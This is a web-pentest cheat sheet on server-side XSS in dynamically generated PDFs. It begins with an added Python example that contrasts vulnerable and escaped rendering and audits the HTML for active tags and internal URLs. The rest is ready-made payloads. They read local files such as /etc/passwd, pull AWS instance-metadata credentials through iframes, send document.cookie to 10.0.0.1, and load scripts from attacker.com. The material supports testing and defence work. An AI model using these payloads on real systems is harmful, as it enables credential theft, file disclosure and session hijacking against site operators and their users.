# XSS with Dynamic PDF

If a PDF file generated somewhere on the website reflects our payloads, we can insert malicious code.
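Every payload on this page depends on reflected input being parsed as markup by the PDF renderer. The Python below is an added example, not code from the original page: it contrasts a vulnerable render with an output-encoded one and audits the HTML for active content and internal URLs before it reaches the renderer. `TEMPLATE`, `render_unsafe`, `render_safe`, `is_internal_url`, `RenderAudit` and `audit` are hypothetical names, and the template is constructed.

```python
import html
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed template standing in for the HTML a site feeds its PDF renderer.
TEMPLATE = "<html><body><h1>Invoice</h1><p>Customer: {name}</p></body></html>"
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
URL_ATTRS = {"src", "href", "data", "action"}

def render_unsafe(name):
    """Vulnerable: the reflected value is parsed as markup by the renderer."""
    return TEMPLATE.format(name=name)

def render_safe(name):
    """Hardened: the reflected value is encoded, so it can only ever be text."""
    return TEMPLATE.format(name=html.escape(name, quote=True))

def is_internal_url(url):
    """True for file:// and for localhost, loopback, private or link-local hosts."""
    try:
        parts = urlsplit(url.strip())
        if parts.scheme == "file" or parts.hostname == "localhost":
            return True
        ip = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False  # not an IP literal (or unparsable): no verdict from this check
    return ip.is_loopback or ip.is_private or ip.is_link_local

class RenderAudit(HTMLParser):
    """Collects findings that should block a document before it is rendered."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}>")
        for key, value in attrs:
            if key.startswith("on"):
                self.findings.append(f"event handler {key} on <{tag}>")
            elif key in URL_ATTRS and value and is_internal_url(value):
                self.findings.append(f"internal URL in <{tag} {key}>")

def audit(document):
    parser = RenderAudit()
    parser.feed(document)
    parser.close()  # flush any markup still buffered by the parser
    return parser.findings
```

The audit does not resolve DNS names, so it complements output encoding and network egress limits on the renderer rather than replacing them.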

### Basic <a href="#basic" id="basic"></a>

```
<img src='x' onerror="document.write('test')">
<script>document.write('test')</script>

"><h1>XSS</h1>
```

### Path Disclosure <a href="#path-disclosure" id="path-disclosure"></a>

```
<img src='x' onerror="document.write(JSON.stringify(window.location))">
<script>document.write('<iframe src=\"' + window.location.href + '\"></iframe>')</script>
```

### LFI/RFI <a href="#lfirfi" id="lfirfi"></a>

```
<iframe src="file:///etc/passwd"></iframe>
<iframe src=file:///etc/passwd width=1000px height=1000px></iframe>
<iframe src=file:///var/www/html/index.php width=1000px height=1000px></iframe>
<iframe src="http://localhost:3000/index.html"></iframe>
<iframe src="http://localhost/server-status" height="1000" width="1000"></iframe>

<img src='x' onerror="document.write('<iframe src=file:///etc/passwd></iframe>')">
```

### LFI/RFI (XHR request) <a href="#lfirfi-xhr-request" id="lfirfi-xhr-request"></a>

```
<script>
    x = new XMLHttpRequest();
    x.onload = function() {
        document.write(this.responseText)
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>
```

### Cookie Hijacking <a href="#cookie-hijacking" id="cookie-hijacking"></a>

```
<img src=x onerror="location.href='http://10.0.0.1/?cookie='+ document.cookie">
```

### External Scripts <a href="#external-scripts" id="external-scripts"></a>

```
<script src="http://attacker.com/test.js"></script>

<img src='x' onerror="document.write('<script src=\"http://10.0.0.1/test.js\"></script>')" />
```

### AWS Instances <a href="#aws-instances" id="aws-instances"></a>

```
<iframe src="http://169.254.169.254/latest/dynamic/instance-identity/" height=1000px width=1000px></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" height=1000px width=1000px></iframe>
```

### wkhtmltopdf <a href="#wkhtmltopdf" id="wkhtmltopdf"></a>

If the website uses “wkhtmltopdf”, please also refer to [this page](https://exploit-notes.hdks.org/exploit/web/wkhtmltopdf-ssrf/).

### References <a href="#references" id="references"></a>

* [HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf)
